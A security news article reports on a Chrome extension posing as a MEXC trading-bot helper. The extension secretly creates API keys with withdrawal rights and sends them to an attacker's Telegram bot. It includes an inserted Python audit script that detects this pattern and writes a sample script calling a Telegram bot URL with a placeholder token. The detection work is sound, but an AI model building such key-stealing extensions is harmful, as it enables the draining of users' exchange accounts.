
Cybersecurity researchers have detailed a malicious Google Chrome extension that can steal API keys related to MEXC, a centralized cryptocurrency exchange (CEX) available in more than 170 countries, while masquerading as a tool to automate transactions on the platform.
The extension is called MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh), has 29 downloads, and is still available in the Chrome Web Store at the time of writing. It was first published on September 1, 2025 by a developer named ‘jorjortan142’.
“The extension programmatically creates new MEXC API keys, enables withdrawal privileges, hides them in the user interface (UI), and leaks the generated API keys and secrets to a hardcoded Telegram bot controlled by the threat actor,” Socket security researcher Kirill Boychenko said in an analysis.
According to the Chrome Web Store listing, this web browser add-on is described as an extension that “simplifies connecting trading bots to MEXC exchanges” by generating API keys with the necessary permissions on the admin page, including facilitating trading and withdrawals.

Once installed, the extension lets the attacker take control of any MEXC account accessed from the compromised browser: execute trades, automate withdrawals, and drain any wallets and balances reachable through the service.
“In practice, as soon as the user navigates to MEXC’s API management page, the extension injects a single content script, script.js, and starts working within an already authenticated MEXC session,” Socket added. To accomplish this, the extension checks if the current URL contains the string “/user/openapi”, which refers to the API key management page.
Next, the script programmatically creates a new API key and ensures that withdrawal permission is enabled. At the same time, it defaces the page’s user interface so the user sees withdrawal permission as disabled. Once the access key and secret key have been generated, the script extracts both values and sends them in an HTTPS POST request to a hard-coded Telegram bot under the threat actor’s control.
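A defender-side check for the traits just described, added here as an example and not part of Socket's analysis or tooling: it audits an unpacked extension directory for a content script that references the “/user/openapi” path together with a hard-coded Telegram Bot API URL. The example exchange host, the placeholder bot token and the sample files it writes are constructed for the demonstration.

```python
import json
import re
import tempfile
from pathlib import Path

# Heuristics drawn from the behaviour described above. The path fragment is the
# one the analysis cites; the Telegram pattern is the public Bot API URL form.
API_MGMT_PATH = "/user/openapi"
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+")


def audit_extension(ext_dir: str) -> dict:
    """Audit an unpacked extension directory and return a findings dict."""
    root = Path(ext_dir)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    findings = {"api_mgmt_refs": [], "telegram_bot_urls": []}
    # The key-management page may be targeted via a manifest match pattern
    # or, as described above, via a URL check inside the content script.
    for cs in manifest.get("content_scripts", []):
        for pat in cs.get("matches", []):
            if API_MGMT_PATH in pat:
                findings["api_mgmt_refs"].append(f"manifest: {pat}")
    for js in root.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="replace")
        if API_MGMT_PATH in text:
            findings["api_mgmt_refs"].append(f"{js.name}: url check")
        for m in TELEGRAM_BOT_RE.finditer(text):
            # Redact the bot token so the finding does not carry a usable credential.
            host_and_id = m.group(0).split(":")[0]
            findings["telegram_bot_urls"].append(f"{js.name}: {host_and_id}:<redacted>")
    # Either trait alone is common; the combination is what matches this playbook.
    findings["suspicious"] = bool(findings["api_mgmt_refs"] and findings["telegram_bot_urls"])
    return findings


def build_sample_extension(malicious: bool) -> str:
    """Write a constructed (not real) unpacked extension to a temp dir; return its path."""
    root = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    manifest = {"manifest_version": 3, "name": "sample", "version": "1.0",
                "content_scripts": [{"matches": ["*://*.exchange.example/*"], "js": ["script.js"]}]}
    (root / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    body = ('if (location.href.includes("/user/openapi")) {\n'
            '  fetch("https://api.telegram.org/bot000000:PLACEHOLDER_TOKEN/sendMessage");\n}\n'
            if malicious else 'document.title = "hello";\n')
    (root / "script.js").write_text(body, encoding="utf-8")
    return str(root)
```

Run `audit_extension` against an extension unpacked from the browser's profile directory; a hit on both traits warrants revoking any exchange API keys created while the extension was installed, since the keys outlive the extension.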
The threat persists as long as the key remains valid and unrevoked, giving the attacker unfettered access to the victim’s account even after the extension is uninstalled from Chrome.
“In effect, the attackers are using the Chrome Web Store as their delivery mechanism, MEXC Web UI as their execution environment, and Telegram as their exfiltration channel,” Boychenko noted. “The result is a proprietary credential-stealing extension that targets MEXC API keys once they are created and configured with full privileges.”
The attack works by piggybacking on an already authenticated browser session, so the attacker never needs to obtain the user’s password or bypass authentication protections.

It is not currently clear who is behind this operation, but references to “jorjortan142” point to an X handle of the same name that links to a Telegram bot named SwapSushiBot. SwapSushiBot is also promoted on TikTok and YouTube; the YouTube channel was created on August 17, 2025.
“By hijacking a single API workflow within the browser, attackers can bypass many traditional controls and directly obtain long-lived API keys with revocation rights,” Socket said. “The same playbook can easily be applied to other exchanges, DeFi dashboards, broker portals, and web consoles that issue tokens during a session. Future variants may introduce stronger obfuscation, request broader browser permissions, and bundle support for multiple platforms into a single extension.”
